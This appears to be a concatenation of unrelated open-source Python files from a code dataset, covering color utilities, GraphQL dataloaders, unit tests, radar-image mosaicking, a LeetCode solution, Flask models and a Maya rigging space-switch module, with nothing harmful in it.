float]: """ Given a 3 or 4 RGB/RGBA color where each color goes 0-255, this returns a RGBA tuple where each item is a scaled float from 0 to 1. :param Color color: Three or four byte tuple :return: Four floats as a RGBA tuple """ if len(color) == 4: return color[0] / 255, color[1] / 255, color[2] / 255, color[3] / 255 # type: ignore elif len(color) == 3: return color[0] / 255, color[1] / 255, color[2] / 255, 1.0 else: raise ValueError("This isn't a 3 or 4 byte color") def get_three_float_color(color: Color) -> Tuple[float, float, float]: """ Given a 3 or 4 RGB/RGBA color where each color goes 0-255, this returns a RGBA tuple where each item is a scaled float from 0 to 1. :param Color color: Three or four byte tuple :return: Three floats as a RGB tuple """ if len(color) == 4 or len(color) == 3: return color[0] / 255, color[1] / 255, color[2] / 255 # type: ignore else: raise ValueError("This isn't a 3 or 4 byte color") def make_transparent_color(color: Color, transparency: float): """ Given a RGB color, along with an alpha, returns a RGBA color tuple. :param Color color: Three or four byte RGBA color :param float transparency: Transparency """ return color[0], color[1], color[2], transparency def uint24_to_three_byte_color(color: int) -> RGB: """ Given an int between 0 and 16777215, return a RGB color tuple. :param int color: 3 byte int """ return (color & (255 << 16)) >> 16, (color & (255 << 8)) >> 8, color & 255 def uint32_to_four_byte_color(color: int) -> RGBA: """ Given an int between 0 and 4294967295, return a RGBA color tuple. :param int color: 4 byte int """ return (color & (255 << 24)) >> 24, (color & (255 << 16)) >> 16, (color & (255 << 8)) >> 8, color & 255 def color_from_hex_string(code: str) -> RGBA: """ Make a color from a hex code (3, 4, 6 or 8 characters of hex, normally with a hashtag) """ code = code.lstrip("#") if len(code) <= 4: code = "".join(i + "0" for i in code) if len(code) == 6: # full opacity if no alpha specified return int(code[0:2], 16), int(code[2:4], 16), int(code[4:6], 16), 255 elif len(code) == 8: return int(code[2:4], 16), int(code[4:6], 16), int(code[6:8], 16), int(code[0:2], 16) raise ValueError("Improperly formatted color passed to color_from_hex") def float_to_byte_color( color: Union[Tuple[float, float, float, float], Tuple[float, float, float]], ) -> Color: """ Converts a float colors to a byte color. This works for 3 of 4-component colors. """ if len(color) == 3: return int(color[0] * 255), int(color[1] * 255), int(color[2] * 255) elif len(color) == 4: color = cast(Tuple[float, float, float, float], color) return int(color[0] * 255), int(color[1] * 255), int(color[2] * 255), int(color[3] * 255) else: raise ValueError(f"color needs to have 3 or 4 components, not {color}")
L1Trigger/L1TMuonEndCap/test/tools/print_sector.py
ckamtsikis/cmssw
852
12748882
<gh_stars>100-1000 #!/usr/bin/env python from __future__ import print_function import sys from math import degrees, pi def main(): if len(sys.argv) < 2: print("Usage: %s radian" % sys.argv[0]) return rad = eval(sys.argv[1]) if rad <= 0.: rad += 2*pi deg = degrees(rad) print("rad: {0} deg: {1}".format(rad, deg)) sector = int((deg - 15)/60.) + 1 print("{0:d}".format(sector)) return # ______________________________________________________________________________ if __name__ == '__main__': main()
saleor/graphql/channel/dataloaders.py
fairhopeweb/saleor
15,337
12748908
from collections import defaultdict from django.db.models import Exists, OuterRef from ...channel.models import Channel from ...order.models import Order from ...shipping.models import ShippingZone from ..checkout.dataloaders import CheckoutByIdLoader, CheckoutLineByIdLoader from ..core.dataloaders import DataLoader from ..order.dataloaders import OrderByIdLoader, OrderLineByIdLoader from ..shipping.dataloaders import ShippingZoneByIdLoader class ChannelByIdLoader(DataLoader): context_key = "channel_by_id" def batch_load(self, keys): channels = Channel.objects.in_bulk(keys) return [channels.get(channel_id) for channel_id in keys] class ChannelBySlugLoader(DataLoader): context_key = "channel_by_slug" def batch_load(self, keys): channels = Channel.objects.in_bulk(keys, field_name="slug") return [channels.get(slug) for slug in keys] class ChannelByCheckoutLineIDLoader(DataLoader): context_key = "channel_by_checkout_line" def batch_load(self, keys): def channel_by_lines(checkout_lines): checkout_ids = [line.checkout_id for line in checkout_lines] def channels_by_checkout(checkouts): channel_ids = [checkout.channel_id for checkout in checkouts] return ChannelByIdLoader(self.context).load_many(channel_ids) return ( CheckoutByIdLoader(self.context) .load_many(checkout_ids) .then(channels_by_checkout) ) return ( CheckoutLineByIdLoader(self.context).load_many(keys).then(channel_by_lines) ) class ChannelByOrderLineIdLoader(DataLoader): context_key = "channel_by_orderline" def batch_load(self, keys): def channel_by_lines(order_lines): order_ids = [line.order_id for line in order_lines] def channels_by_checkout(orders): channel_ids = [order.channel_id for order in orders] return ChannelByIdLoader(self.context).load_many(channel_ids) return ( OrderByIdLoader(self.context) .load_many(order_ids) .then(channels_by_checkout) ) return OrderLineByIdLoader(self.context).load_many(keys).then(channel_by_lines) class ChannelWithHasOrdersByIdLoader(DataLoader): context_key = "channel_with_has_orders_by_id" def batch_load(self, keys): orders = Order.objects.filter(channel=OuterRef("pk")) channels = Channel.objects.annotate(has_orders=Exists(orders)).in_bulk(keys) return [channels.get(channel_id) for channel_id in keys] class ShippingZonesByChannelIdLoader(DataLoader): context_key = "shippingzone_by_channel" def batch_load(self, keys): zone_and_channel_is_pairs = ShippingZone.objects.filter( channels__id__in=keys ).values_list("pk", "channels__id") channel_shipping_zone_map = defaultdict(list) for zone_id, channel_id in zone_and_channel_is_pairs: channel_shipping_zone_map[channel_id].append(zone_id) def map_shipping_zones(shipping_zones): zone_map = {zone.pk: zone for zone in shipping_zones} return [ [zone_map[zone_id] for zone_id in channel_shipping_zone_map[channel_id]] for channel_id in keys ] return ( ShippingZoneByIdLoader(self.context) .load_many({pk for pk, _ in zone_and_channel_is_pairs}) .then(map_shipping_zones) )
venv/lib/python3.9/site-packages/py2app/bootstrap/reset_sys_path.py
dequeb/asmbattle
193
12748926
def _reset_sys_path(): # Clear generic sys.path[0] import os import sys resources = os.environ["RESOURCEPATH"] while sys.path[0] == resources: del sys.path[0] _reset_sys_path()
src/seedwork/infrastructure/test_repository.py
Ermlab/python-ddd
308
12748929
from seedwork.infrastructure.repository import InMemoryRepository from seedwork.domain.entities import Entity class Person(Entity): first_name: str last_name: str def test_InMemoryRepository_persist_one(): # arrange person = Person(first_name="John", last_name="Doe") repository = InMemoryRepository() # act repository.insert(person) # assert assert repository.get_by_id(person.id) == person def test_InMemoryRepository_persist_two(): # arrange person1 = Person(first_name="John", last_name="Doe") person2 = Person(first_name="Mary", last_name="Doe") repository = InMemoryRepository() # act repository.insert(person1) repository.insert(person2) # assert assert repository.get_by_id(person1.id) == person1 assert repository.get_by_id(person2.id) == person2
components/isceobj/Alos2burstProc/runSwathMosaic.py
vincentschut/isce2
1,133
12748932
# # Author: <NAME> # Copyright 2015-present, NASA-JPL/Caltech # import os import logging import isceobj from isceobj.Alos2Proc.runSwathMosaic import swathMosaic from isceobj.Alos2Proc.runSwathMosaic import swathMosaicParameters from isceobj.Alos2Proc.Alos2ProcPublic import create_xml logger = logging.getLogger('isce.alos2burstinsar.runSwathMosaic') def runSwathMosaic(self): '''mosaic subswaths ''' catalog = isceobj.Catalog.createCatalog(self._insar.procDoc.name) self.updateParamemetersFromUser() referenceTrack = self._insar.loadTrack(reference=True) secondaryTrack = self._insar.loadTrack(reference=False) for i, frameNumber in enumerate(self._insar.referenceFrames): frameDir = 'f{}_{}'.format(i+1, frameNumber) os.chdir(frameDir) mosaicDir = 'mosaic' os.makedirs(mosaicDir, exist_ok=True) os.chdir(mosaicDir) if self._insar.endingSwath-self._insar.startingSwath+1 == 1: import shutil swathDir = 's{}'.format(referenceTrack.frames[i].swaths[0].swathNumber) if not os.path.isfile(self._insar.interferogram): os.symlink(os.path.join('../', swathDir, self._insar.interferogram), self._insar.interferogram) shutil.copy2(os.path.join('../', swathDir, self._insar.interferogram+'.vrt'), self._insar.interferogram+'.vrt') shutil.copy2(os.path.join('../', swathDir, self._insar.interferogram+'.xml'), self._insar.interferogram+'.xml') if not os.path.isfile(self._insar.amplitude): os.symlink(os.path.join('../', swathDir, self._insar.amplitude), self._insar.amplitude) shutil.copy2(os.path.join('../', swathDir, self._insar.amplitude+'.vrt'), self._insar.amplitude+'.vrt') shutil.copy2(os.path.join('../', swathDir, self._insar.amplitude+'.xml'), self._insar.amplitude+'.xml') # os.rename(os.path.join('../', swathDir, self._insar.interferogram), self._insar.interferogram) # os.rename(os.path.join('../', swathDir, self._insar.interferogram+'.vrt'), self._insar.interferogram+'.vrt') # os.rename(os.path.join('../', swathDir, self._insar.interferogram+'.xml'), self._insar.interferogram+'.xml') # os.rename(os.path.join('../', swathDir, self._insar.amplitude), self._insar.amplitude) # os.rename(os.path.join('../', swathDir, self._insar.amplitude+'.vrt'), self._insar.amplitude+'.vrt') # os.rename(os.path.join('../', swathDir, self._insar.amplitude+'.xml'), self._insar.amplitude+'.xml') #update frame parameters ######################################################### frame = referenceTrack.frames[i] infImg = isceobj.createImage() infImg.load(self._insar.interferogram+'.xml') #mosaic size frame.numberOfSamples = infImg.width frame.numberOfLines = infImg.length #NOTE THAT WE ARE STILL USING SINGLE LOOK PARAMETERS HERE #range parameters frame.startingRange = frame.swaths[0].startingRange frame.rangeSamplingRate = frame.swaths[0].rangeSamplingRate frame.rangePixelSize = frame.swaths[0].rangePixelSize #azimuth parameters frame.sensingStart = frame.swaths[0].sensingStart frame.prf = frame.swaths[0].prf frame.azimuthPixelSize = frame.swaths[0].azimuthPixelSize frame.azimuthLineInterval = frame.swaths[0].azimuthLineInterval #update frame parameters, secondary ######################################################### frame = secondaryTrack.frames[i] #mosaic size frame.numberOfSamples = int(frame.swaths[0].numberOfSamples/self._insar.numberRangeLooks1) frame.numberOfLines = int(frame.swaths[0].numberOfLines/self._insar.numberAzimuthLooks1) #NOTE THAT WE ARE STILL USING SINGLE LOOK PARAMETERS HERE #range parameters frame.startingRange = frame.swaths[0].startingRange frame.rangeSamplingRate = frame.swaths[0].rangeSamplingRate frame.rangePixelSize = frame.swaths[0].rangePixelSize #azimuth parameters frame.sensingStart = frame.swaths[0].sensingStart frame.prf = frame.swaths[0].prf frame.azimuthPixelSize = frame.swaths[0].azimuthPixelSize frame.azimuthLineInterval = frame.swaths[0].azimuthLineInterval os.chdir('../') #save parameter file self._insar.saveProduct(referenceTrack.frames[i], self._insar.referenceFrameParameter) self._insar.saveProduct(secondaryTrack.frames[i], self._insar.secondaryFrameParameter) os.chdir('../') continue #choose offsets numberOfFrames = len(referenceTrack.frames) numberOfSwaths = len(referenceTrack.frames[i].swaths) if self.swathOffsetMatching: #no need to do this as the API support 2-d list #rangeOffsets = (np.array(self._insar.swathRangeOffsetMatchingReference)).reshape(numberOfFrames, numberOfSwaths) #azimuthOffsets = (np.array(self._insar.swathAzimuthOffsetMatchingReference)).reshape(numberOfFrames, numberOfSwaths) rangeOffsets = self._insar.swathRangeOffsetMatchingReference azimuthOffsets = self._insar.swathAzimuthOffsetMatchingReference else: #rangeOffsets = (np.array(self._insar.swathRangeOffsetGeometricalReference)).reshape(numberOfFrames, numberOfSwaths) #azimuthOffsets = (np.array(self._insar.swathAzimuthOffsetGeometricalReference)).reshape(numberOfFrames, numberOfSwaths) rangeOffsets = self._insar.swathRangeOffsetGeometricalReference azimuthOffsets = self._insar.swathAzimuthOffsetGeometricalReference rangeOffsets = rangeOffsets[i] azimuthOffsets = azimuthOffsets[i] #list of input files inputInterferograms = [] inputAmplitudes = [] for j, swathNumber in enumerate(range(self._insar.startingSwath, self._insar.endingSwath + 1)): swathDir = 's{}'.format(swathNumber) inputInterferograms.append(os.path.join('../', swathDir, self._insar.interferogram)) inputAmplitudes.append(os.path.join('../', swathDir, self._insar.amplitude)) #note that frame parameters are updated after mosaicking #mosaic amplitudes swathMosaic(referenceTrack.frames[i], inputAmplitudes, self._insar.amplitude, rangeOffsets, azimuthOffsets, self._insar.numberRangeLooks1, self._insar.numberAzimuthLooks1, resamplingMethod=0) #mosaic interferograms swathMosaic(referenceTrack.frames[i], inputInterferograms, self._insar.interferogram, rangeOffsets, azimuthOffsets, self._insar.numberRangeLooks1, self._insar.numberAzimuthLooks1, updateFrame=True, resamplingMethod=1) create_xml(self._insar.amplitude, referenceTrack.frames[i].numberOfSamples, referenceTrack.frames[i].numberOfLines, 'amp') create_xml(self._insar.interferogram, referenceTrack.frames[i].numberOfSamples, referenceTrack.frames[i].numberOfLines, 'int') #update secondary frame parameters here #no matching for secondary, always use geometry rangeOffsets = self._insar.swathRangeOffsetGeometricalSecondary azimuthOffsets = self._insar.swathAzimuthOffsetGeometricalSecondary rangeOffsets = rangeOffsets[i] azimuthOffsets = azimuthOffsets[i] swathMosaicParameters(secondaryTrack.frames[i], rangeOffsets, azimuthOffsets, self._insar.numberRangeLooks1, self._insar.numberAzimuthLooks1) os.chdir('../') #save parameter file self._insar.saveProduct(referenceTrack.frames[i], self._insar.referenceFrameParameter) self._insar.saveProduct(secondaryTrack.frames[i], self._insar.secondaryFrameParameter) os.chdir('../') #mosaic spectral diversity interferograms for i, frameNumber in enumerate(self._insar.referenceFrames): frameDir = 'f{}_{}'.format(i+1, frameNumber) os.chdir(frameDir) mosaicDir = 'mosaic' os.makedirs(mosaicDir, exist_ok=True) os.chdir(mosaicDir) if self._insar.endingSwath-self._insar.startingSwath+1 == 1: import shutil swathDir = 's{}'.format(referenceTrack.frames[i].swaths[0].swathNumber) for sdFile in self._insar.interferogramSd: if not os.path.isfile(sdFile): os.symlink(os.path.join('../', swathDir, 'spectral_diversity', sdFile), sdFile) shutil.copy2(os.path.join('../', swathDir, 'spectral_diversity', sdFile+'.vrt'), sdFile+'.vrt') shutil.copy2(os.path.join('../', swathDir, 'spectral_diversity', sdFile+'.xml'), sdFile+'.xml') os.chdir('../') os.chdir('../') continue #choose offsets numberOfFrames = len(referenceTrack.frames) numberOfSwaths = len(referenceTrack.frames[i].swaths) if self.swathOffsetMatching: #no need to do this as the API support 2-d list #rangeOffsets = (np.array(self._insar.swathRangeOffsetMatchingReference)).reshape(numberOfFrames, numberOfSwaths) #azimuthOffsets = (np.array(self._insar.swathAzimuthOffsetMatchingReference)).reshape(numberOfFrames, numberOfSwaths) rangeOffsets = self._insar.swathRangeOffsetMatchingReference azimuthOffsets = self._insar.swathAzimuthOffsetMatchingReference else: #rangeOffsets = (np.array(self._insar.swathRangeOffsetGeometricalReference)).reshape(numberOfFrames, numberOfSwaths) #azimuthOffsets = (np.array(self._insar.swathAzimuthOffsetGeometricalReference)).reshape(numberOfFrames, numberOfSwaths) rangeOffsets = self._insar.swathRangeOffsetGeometricalReference azimuthOffsets = self._insar.swathAzimuthOffsetGeometricalReference rangeOffsets = rangeOffsets[i] azimuthOffsets = azimuthOffsets[i] #list of input files inputSd = [[], [], []] for j, swathNumber in enumerate(range(self._insar.startingSwath, self._insar.endingSwath + 1)): swathDir = 's{}'.format(swathNumber) for k, sdFile in enumerate(self._insar.interferogramSd): inputSd[k].append(os.path.join('../', swathDir, 'spectral_diversity', sdFile)) #mosaic spectral diversity interferograms for inputSdList, outputSdFile in zip(inputSd, self._insar.interferogramSd): swathMosaic(referenceTrack.frames[i], inputSdList, outputSdFile, rangeOffsets, azimuthOffsets, self._insar.numberRangeLooks1, self._insar.numberAzimuthLooks1, updateFrame=False, phaseCompensation=True, pcRangeLooks=5, pcAzimuthLooks=5, filt=True, resamplingMethod=1) for sdFile in self._insar.interferogramSd: create_xml(sdFile, referenceTrack.frames[i].numberOfSamples, referenceTrack.frames[i].numberOfLines, 'int') os.chdir('../') os.chdir('../') catalog.printToLog(logger, "runSwathMosaic") self._insar.procDoc.addAllFromCatalog(catalog)
manubot/cite/tests/test_pubmed.py
benstear/manubot
299
12748972
import pytest from manubot.cite.pubmed import ( get_pmcid_and_pmid_for_doi, get_pmid_for_doi, get_pubmed_ids_for_doi, ) @pytest.mark.parametrize( ("doi", "pmid"), [ ("10.1098/rsif.2017.0387", "29618526"), # in PubMed and PMC ("10.1161/CIRCGENETICS.115.001181", "27094199"), # in PubMed but not PMC ("10.7717/peerj-cs.134", None), # DOI in journal not indexed by PubMed ("10.1161/CIRC", None), # invalid DOI ], ) def test_get_pmid_for_doi(doi, pmid): output = get_pmid_for_doi(doi) assert pmid == output @pytest.mark.parametrize( ("doi", "id_dict"), [ ("10.1098/rsif.2017.0387", {"PMCID": "PMC5938574", "PMID": "29618526"}), ("10.7554/ELIFE.32822", {"PMCID": "PMC5832410", "PMID": "29424689"}), ("10.1161/CIRCGENETICS.115.001181", {}), # only in PubMed, not in PMC ("10.7717/peerj.000", {}), # Non-existent DOI ("10.peerj.000", {}), # malformed DOI ], ) def test_get_pmcid_and_pmid_for_doi(doi, id_dict): output = get_pmcid_and_pmid_for_doi(doi) assert id_dict == output @pytest.mark.parametrize( ("doi", "id_dict"), [ ("10.1098/rsif.2017.0387", {"PMCID": "PMC5938574", "PMID": "29618526"}), ("10.7554/ELIFE.32822", {"PMCID": "PMC5832410", "PMID": "29424689"}), ( "10.1161/CIRCGENETICS.115.001181", {"PMID": "27094199"}, ), # only in PubMed, not in PMC ("10.7717/peerj.000", {}), # Non-existent DOI ], ) def test_get_pubmed_ids_for_doi(doi, id_dict): output = get_pubmed_ids_for_doi(doi) assert id_dict == output
Python/split-a-string-in-balanced-strings.py
shreyventure/LeetCode-Solutions
388
12749011
class Solution: """ Time Complexity: O(N) Space Complexity: O(1) """ def balanced_string_split(self, s: str) -> int: # initialize variables L_count, R_count = 0, 0 balanced_substring_count = 0 # parse the string for char in s: # update the number of Ls and the number of Rs so far if char == 'L': L_count += 1 elif char == 'R': R_count += 1 # if the string is balanced, increment the balanced substrings count and reset the counters if L_count == R_count: balanced_substring_count += 1 L_count, R_count = 0, 0 return balanced_substring_count
Chapter10/webapp/blog/models.py
jayakumardhananjayan/pythonwebtut
135
12749019
import datetime from .. import db tags = db.Table( 'post_tags', db.Column('post_id', db.Integer, db.ForeignKey('post.id')), db.Column('tag_id', db.Integer, db.ForeignKey('tag.id')) ) class Post(db.Model): id = db.Column(db.Integer(), primary_key=True) title = db.Column(db.String(255), nullable=False) text = db.Column(db.Text(), nullable=False) publish_date = db.Column(db.DateTime(), default=datetime.datetime.now) user_id = db.Column(db.Integer(), db.ForeignKey('user.id')) comments = db.relationship( 'Comment', backref='post', lazy='dynamic' ) tags = db.relationship( 'Tag', secondary=tags, backref=db.backref('posts', lazy='dynamic') ) def __init__(self, title=""): self.title = title def __repr__(self): return "<Post '{}'>".format(self.title) class Comment(db.Model): id = db.Column(db.Integer(), primary_key=True) name = db.Column(db.String(255), nullable=False) text = db.Column(db.Text(), nullable=False) date = db.Column(db.DateTime(), default=datetime.datetime.now) post_id = db.Column(db.Integer(), db.ForeignKey('post.id')) def __repr__(self): return "<Comment '{}'>".format(self.text[:15]) class Tag(db.Model): id = db.Column(db.Integer(), primary_key=True) title = db.Column(db.String(255), nullable=False, unique=True) def __init__(self, title=""): self.title = title def __repr__(self): return "<Tag '{}'>".format(self.title) class Reminder(db.Model): id = db.Column(db.Integer(), primary_key=True) date = db.Column(db.DateTime()) email = db.Column(db.String()) text = db.Column(db.Text()) def __repr__(self): return "<Reminder '{}'>".format(self.text[:20])
tests/data/test_unsupervised_sampler.py
LarsNeR/stellargraph
2,428
12749027
<filename>tests/data/test_unsupervised_sampler.py # -*- coding: utf-8 -*- # # Copyright 2017-2020 Data61, CSIRO # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. import pytest import numpy as np from collections import defaultdict from stellargraph.data.unsupervised_sampler import UnsupervisedSampler from stellargraph.data.explorer import UniformRandomWalk from ..test_utils.graphs import line_graph def test_init_parameters(line_graph): # if no graph is provided with pytest.raises(ValueError): UnsupervisedSampler(G=None) # walk must have length strictly greater than 1 with pytest.raises(ValueError): UnsupervisedSampler(G=line_graph, length=1) # at least 1 walk from each root node with pytest.raises(ValueError): UnsupervisedSampler(G=line_graph, number_of_walks=0) # nodes nodes parameter should be an iterable of node IDs with pytest.raises(ValueError): UnsupervisedSampler(G=line_graph, nodes=1) # if no root nodes are provided for sampling defaulting to using all nodes as root nodes sampler = UnsupervisedSampler(G=line_graph, nodes=None) assert sampler.nodes == list(line_graph.nodes()) def test_run_batch_sizes(line_graph): batch_size = 4 sampler = UnsupervisedSampler(G=line_graph, length=2, number_of_walks=2) batches = sampler.run(batch_size) # check batch sizes assert len(batches) == np.ceil(len(line_graph.nodes()) * 4 / batch_size) for ids, labels in batches[:-1]: assert len(ids) == len(labels) == batch_size # last batch can be smaller ids, labels = batches[-1] assert len(ids) == len(labels) assert len(ids) <= batch_size def test_run_context_pairs(line_graph): batch_size = 4 sampler = UnsupervisedSampler(G=line_graph, length=2, number_of_walks=2) batches = sampler.run(batch_size) grouped_by_target = defaultdict(list) for ids, labels in batches: for (target, context), label in zip(ids, labels): grouped_by_target[target].append((context, label)) assert len(grouped_by_target) == len(line_graph.nodes()) for target, sampled in grouped_by_target.items(): # exactly 2 positive and 2 negative context pairs for each target node assert len(sampled) == 4 # since each walk has length = 2, there must be an edge between each positive context pair for context, label in sampled: if label == 1: assert context in set(line_graph.neighbors(target)) def test_walker_uniform_random(line_graph): length = 3 number_of_walks = 2 batch_size = 4 walker = UniformRandomWalk(line_graph, n=number_of_walks, length=length) sampler = UnsupervisedSampler(line_graph, walker=walker) batches = sampler.run(batch_size) # batches should match the parameters used to create the walker object, instead of the defaults # for UnsupervisedSampler expected_num_batches = np.ceil( line_graph.number_of_nodes() * number_of_walks * (length - 1) * 2 / batch_size ) assert len(batches) == expected_num_batches class CustomWalker: def run(self, nodes): return [[node, node] for node in nodes] def test_walker_custom(line_graph): walker = CustomWalker() sampler = UnsupervisedSampler(line_graph, walker=walker) batches = sampler.run(2) assert len(batches) == line_graph.number_of_nodes() # all positive examples should be self loops, since we defined our custom walker this way for context_pairs, labels in batches: for node, neighbour in context_pairs[labels == 1]: assert node == neighbour def test_ignored_param_warning(line_graph): walker = UniformRandomWalk(line_graph, n=2, length=3) with pytest.raises(ValueError, match="cannot specify both 'walker' and 'length'"): UnsupervisedSampler(line_graph, walker=walker, length=5) with pytest.raises( ValueError, match="cannot specify both 'walker' and 'number_of_walks'" ): UnsupervisedSampler(line_graph, walker=walker, number_of_walks=5) with pytest.raises(ValueError, match="cannot specify both 'walker' and 'seed'"): UnsupervisedSampler(line_graph, walker=walker, seed=1)
Programming Languages/Python/Theory/100_Python_Exercises/Exercises/Exercise 28/28.py
jaswinder9051998/Resources
101
12749144
<gh_stars>100-1000 #Why is the error and how to fix it? #A: A TypeError menas you are using the wrong type to make an operation. Change print(a+b) to return a+b def foo(a, b): print(a + b) x = foo(2, 3) * 10
core/native/vendor/cx_Freeze-5.0.1/cx_Freeze/samples/simple/hello.py
tensorlang/nao
332
12749152
#!/usr/bin/env python # -*- coding: utf-8 -*- from datetime import datetime import sys from sys import stdout stdout.write('Hello from cx_Freeze\n') stdout.write('The current date is %s\n\n' % datetime.today().strftime('%B %d, %Y %H:%M:%S')) stdout.write('Executable: %r\n' % sys.executable) stdout.write('Prefix: %r\n' % sys.prefix) stdout.write('Default encoding: %r\n' % sys.getdefaultencoding()) stdout.write('File system encoding: %r\n\n' % sys.getfilesystemencoding()) stdout.write('ARGUMENTS:\n') for a in sys.argv: stdout.write('%s\n' % a) stdout.write('\n') stdout.write('PATH:\n') for p in sys.path: stdout.write('%s\n' % p) stdout.write('\n')
lite/tests/unittest_py/op/test_linspace_op.py
714627034/Paddle-Lite
808
12749159
# Copyright (c) 2021 PaddlePaddle Authors. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. import sys sys.path.append('../') from auto_scan_test import AutoScanTest, IgnoreReasons from program_config import TensorConfig, ProgramConfig, OpConfig, CxxConfig, TargetType, PrecisionType, DataLayoutType, Place import unittest import hypothesis from hypothesis import given, settings, seed, example, assume import hypothesis.strategies as st import argparse import numpy as np from functools import partial class TestLinspaceOp(AutoScanTest): def __init__(self, *args, **kwargs): AutoScanTest.__init__(self, *args, **kwargs) self.enable_testing_on_place( TargetType.Host, PrecisionType.FP32, DataLayoutType.NCHW, thread=[1, 2]) def is_program_valid(self, program_config: ProgramConfig, predictor_config: CxxConfig) -> bool: return True def sample_program_configs(self, draw): start_id = draw(st.integers(min_value=0, max_value=5)) stop_id = draw(st.integers(min_value=50, max_value=60)) num_data = draw(st.integers(min_value=1, max_value=10)) op_type_str = draw(st.sampled_from( [5])) #2:int 5:float, lite only support float def generate_start1(*args, **kwargs): return np.array([float(start_id)]).astype(np.float32) def generate_start2(*args, **kwargs): return np.array([int(start_id)]).astype(np.int32) def generate_stop1(*args, **kwargs): return np.array([float(stop_id)]).astype(np.float32) def generate_stop2(*args, **kwargs): return np.array([int(stop_id)]).astype(np.int32) def generate_num(*args, **kwargs): return np.array([int(num_data)]).astype(np.int32) build_ops = OpConfig( type="linspace", inputs={ "Start": ["start_data"], "Stop": ["stop_data"], "Num": ["num_data"], }, outputs={"Out": ["output_data"], }, attrs={"dtype": int(op_type_str)}) if op_type_str == 2: program_config = ProgramConfig( ops=[build_ops], weights={}, inputs={ "start_data": TensorConfig(data_gen=partial(generate_start2)), "stop_data": TensorConfig(data_gen=partial(generate_stop2)), "num_data": TensorConfig(data_gen=partial(generate_num)), }, outputs=["output_data"]) elif op_type_str == 5: program_config = ProgramConfig( ops=[build_ops], weights={}, inputs={ "start_data": TensorConfig(data_gen=partial(generate_start1)), "stop_data": TensorConfig(data_gen=partial(generate_stop1)), "num_data": TensorConfig(data_gen=partial(generate_num)), }, outputs=["output_data"]) return program_config def sample_predictor_configs(self): return self.get_predictor_configs(), ["linspace"], (1e-5, 1e-5) def add_ignore_pass_case(self): pass def test(self, *args, **kwargs): self.run_and_statis(quant=False, max_examples=25) if __name__ == "__main__": unittest.main(argv=[''])
scripts/cmt/rig/spaceswitch.py
kamilisa/cmt
199
12749173
"""Space switching without constraints or extra DAG nodes. Contains functions to create a space switching network as well as seamlessly switching between spaces. Example Usage ============= :: import cmt.rig.spaceswitch as spaceswitch # Create the space switch spaceswitch.create_space_switch( pole_vector_control, [(ik_control, "foot"), (root_control, "root"), (world_control, "world")], switch_attribute="space", use_rotate=False, ) # Seamless switch spaceswitch.switch_space(pole_vector_control, "space", 1, create_keys=False) """ import maya.cmds as cmds import maya.api.OpenMaya as OpenMaya from cmt.dge import dge import cmt.rig.common as common import cmt.shortcuts as shortcuts def create_space_switch( node, drivers, switch_attribute=None, use_translate=True, use_rotate=True ): """Creates a space switch network. The network uses the offsetParentMatrix attribute and does not create any constraints or new dag nodes. :param node: Transform to drive :param drivers: List of tuples: [(driver1, "spaceName1"), (driver2, "spaceName2")] :param switch_attribute: Name of the switch attribute to create on the target node. """ if switch_attribute is None: switch_attribute = "space" if cmds.objExists("{}.{}".format(node, switch_attribute)): cmds.deleteAttr(node, at=switch_attribute) names = [d[1] for d in drivers] cmds.addAttr(node, ln=switch_attribute, at="enum", en=":".join(names), keyable=True) # Create attribute to toggle translation in the matrices enable_translate_attr = _create_bool_attribute( node, "{}UseTranslate".format(switch_attribute), use_translate ) # Create attribute to toggle rotation in the matrices enable_rotate_attr = _create_bool_attribute( node, "{}UseRotate".format(switch_attribute), use_rotate ) blend = cmds.createNode("blendMatrix", name="{}_spaceswitch".format(node)) # Get the current offset parent matrix. This is used as the starting blend point m = OpenMaya.MMatrix(cmds.getAttr("{}.offsetParentMatrix".format(node))) cmds.setAttr("{}.inputMatrix".format(blend), list(m), type="matrix") parent = cmds.listRelatives(node, parent=True, path=True) to_parent_local = "{}.worldInverseMatrix[0]".format(parent[0]) if parent else None for i, driver in enumerate(drivers): driver = driver[0] _connect_driver_matrix_network(blend, node, driver, i, to_parent_local) target_attr = "{}.target[{}]".format(blend, i) # Hook up the weight toggle when switching spaces dge( "x = switch == {} ? 1 : 0".format(i), x="{}.weight".format(target_attr), switch="{}.{}".format(node, switch_attribute), ) # Connect the translation, rotation toggles cmds.connectAttr(enable_translate_attr, "{}.useTranslate".format(target_attr)) cmds.connectAttr(enable_rotate_attr, "{}.useRotate".format(target_attr, i)) cmds.connectAttr( "{}.outputMatrix".format(blend), "{}.offsetParentMatrix".format(node) ) def _create_bool_attribute(node, attribute, default_value): cmds.addAttr( node, ln=attribute, at="bool", defaultValue=default_value, keyable=True ) return "{}.{}".format(node, attribute) def _connect_driver_matrix_network(blend, node, driver, index, to_parent_local): # The multMatrix node will calculate the transformation to blend to when driven # by this driver transform mult = cmds.createNode( "multMatrix", name="spaceswitch_{}_to_{}".format(node, driver) ) offset = ( shortcuts.get_dag_path2(node).exclusiveMatrix() * OpenMaya.MMatrix(cmds.getAttr("{}.worldInverseMatrix[0]".format(driver))) ) cmds.setAttr("{}.matrixIn[0]".format(mult), list(offset), type="matrix") cmds.connectAttr("{}.worldMatrix[0]".format(driver), "{}.matrixIn[1]".format(mult)) if to_parent_local: cmds.connectAttr(to_parent_local, "{}.matrixIn[2]".format(mult)) cmds.connectAttr( "{}.matrixSum".format(mult), "{}.target[{}].targetMatrix".format(blend, index) ) def switch_space(node, attribute, space, create_keys=False): """Seamlessly switch between spaces :param node: Node to switch :param attribute: Space switching attribute on node :param space: Space index in the space attribute :param create_keys: True to create switching keys """ m = cmds.xform(node, q=True, ws=True, m=True) cmds.setAttr("{}.{}".format(node, attribute), space) cmds.xform(node, ws=True, m=m)
nmigen/hdl/mem.py
psumesh/nmigen
528
12749228
